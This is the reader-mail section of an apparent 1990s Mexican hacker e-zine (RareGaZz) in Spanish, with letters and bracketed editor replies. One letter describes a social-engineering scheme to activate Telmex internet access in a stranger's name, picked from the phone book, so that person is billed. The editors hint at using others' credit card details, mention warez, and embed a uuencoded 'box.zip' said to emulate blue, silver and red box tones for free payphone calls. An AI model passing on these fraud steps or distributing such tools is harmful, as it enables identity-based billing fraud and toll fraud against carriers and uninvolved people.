   lo bautizo como "Le pompeItor" cambiando una "a" por "e". Al principio
   se puso una encabronada LePompeItor y recuerdo que una vez mientras
   haciamos chat tratabamos de convencerlo yo y rare de que por una simple
   letra no iba a pasar nada ... creimos haberlo convencido. 5 minutos despues
   reviso el correo y aparece un mensaje con el subject "KILLERBAT" que
   significa en espaol "Vampiro Asesino". RareTrip me habla en el canal y
   me dice que recibio un mensaje de LePompeItor con el subject "RARETRAP" que
   significa "Trampa Rara". En ese momento entendi claramente que a pesar de
   ser tan solo una letra, alteraba completamente el significado que para el
   tenia su nickname. Ahora ya esta repuesto de ese trauma y esperamos que
   luego regrese a la revista cuando termine sus examenes :-) ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 oye les paso un tip para accesso gratuito un mes en Telefonos de
 mexico lo ke tienes ke hacer es hablar a uno de estos telefonos.

               525 2412222     DESDE EL D.F.
         91    80077634          Interior de la Republica.

 Hablas y dice ke acabas comprar tu pakete de Internet de
 Mxico en Sanborns y ke kieres activar tu cuenta como
 dice hay en el manual pero dilo con seguridad para ke no
 te pregunten nada agarra la seccion blanca y busca a un
 ingenuo ke si la cuenta pasa del mes te cobran 240 a tu
 recivo telefonico te pide nombre del ke sale el recibo es
 del ke biene en la seccion bl. das los datos lo unico a conseguir
 es la delegacion pero eso es facil...

El telefono del modem es : 3289928 D.F. otro estado pregunta.
Pregunta el DNS diles ke tienes NT y lo NECESITAS

P.D. Tiene Buena Velocidad !!!!!!

                                    ATTN. AcidGum 97

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

Hola, acabo de visitar su pagina y se me hace muy buena, hay modo de
recibir la revista por e-mail cada que sale?  no les costaria mucho
trabajo y nos mantendrian contentos

Arturo Vega

 [ Antes mandabamos la revista por email, pero era un pedo cuando rebotaban
   los mensajes asi que por ahora solo podemos avisar a la lista cuando un
   nuevo numero esta disponible.                                           ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

Primero MUCHAS FELICIDADES !!!! esta muy suave su web page sigan asi , 
me gustaria comentarles que tambien ustedes     deverian de sacar cosas 
para macintosh tambien hay muchos usuarios de mac. 

        Saludos 

Max

 [ Ya incluimos algunos programas para Mac's en nuestra seccion de WareZ,
  tambien en los links -seccion macintosh- encontraras varios lugares
  con programas para mac's. Ahora que nuestros textos tratan de ser igual
  de utiles para los usuarios de Mac's y Peces (excepto el warez incluido). ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 avisadme si cambiais la dirreccion, ok? =:)

 [ Cuando nos mudemos de servidor (esperamos sea pronto) todos los de la
   lista de correo seran notificados. Don't Worry! ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 Me encanta raregazz aunque baje dos veces eudora pro y nunca le pude hacer el
 setup porque siempre le faltaron archivos.. como puedo hacerlo para que
 termine bien el downloading?

 [ Primer TRAGICO error de RareGaZz, al parecer el link para Eudora Pro no
   servia :-(  disculpas... ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

hola amigos de RAREGAZZ tengo algunas dudas que quisiera me pudieran
responder la primera es la sig. en la revista #3 en la seccion nueva
tecnologia hablan acerca de cybermedia yo baje ese programa y quisiera
saber si este tiene algun virus y si es asi que puedo hacer para quitarlo y
si no me pudieran conseguir una clave para registrarlo, otra duda es que
quise abrir una cuenta en hotmail y me regresa que hay un error en que el
login ya existe lo cambie varias veces y no me acepta ninguno sera que no
le caigo bien al servidor, otra duda es si cada que quiera usar el
anonymizer tengo que entrar a esta pagina primero, y por ultimo quisiera
que explicaran para gente como yo paso a paso como funciona el programa
phreak gracias por leer mi mensaje atte. yo

 [ El programa de cybermedia es muy util, lo malo es que hay que pagar
   a menos que consigas alguna informacion sobre una tarjeta de credito :)
   Una cuenta en Hotmail...Humm, intenta www.gratismail.com
   Para usar el anonymizer tienes que entrar a esa pagina, escoger
   BEGIN SURFING ANONYMOUSLY y de ahi poner la URL a donde quieras ir.
   El problema mas reciente es que a hotmail no le gusto que la gente entrara
   a su sistema usando el anonimizador asi que bloqueo el servicio a los
   usuarios del anonymizer, pero ahora podras usar el anonymizer en
   www.gratismail.com!
   Los programas PHREAK emulan los tonos de un telefono para que sin necesidad
   de presionar los botones puedas marcar algun numero. Las mas comunes son
   BLUE BOX y SILVER BOX. A continuacion viene el codigo UUENCODE de un
   programa que emula las 2 cajas y la RED BOX que son los tonos que hacen
   las monedas al caer al telefono publico. Asegurate de leer el texto de
   TRUCO en este numero y podras llamar gratis de cualquier telefono
   publico usando este programita... ;-) ]

begin 644 box.zip
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
M-P,```P``````````0`@`+:!*R```$E.4U1254-#+E185%!+!08``````@`"
+`&\```#Z(0``````
`
end

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

Que tal, pueden comunicarse por telnet al 148.228.75.5
el login es bbs y en el password solo enter...
Para entrar como invitado en userid: es guest y passwd igual.
Me he dado cuenta que solo es entre semana,
Por cierto, Cuantas llaves publicas tienen?
 [ Ahora solo una :-) la de la revista. ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

Como ustedes dijeron en la revista que se metian a yahoo chat me meti y 
es una verdarera mierda si quieren un chat de verdad metanse en 
www.venezuelanet.com y www.starmedia.com son lo suficientemente rapido 
para conversar un buen rato.

ok ratas nos vemos.

Arkangel

 [ Tienes razon, el chat de yahoo esta lleno de personas buscando cybersexo
   y otras estupideces. Pero recuerda que nosotros dijimos que lo usabamos
   por su excepcional rapidez (instalando el plugin) no por su ambiente.   ]

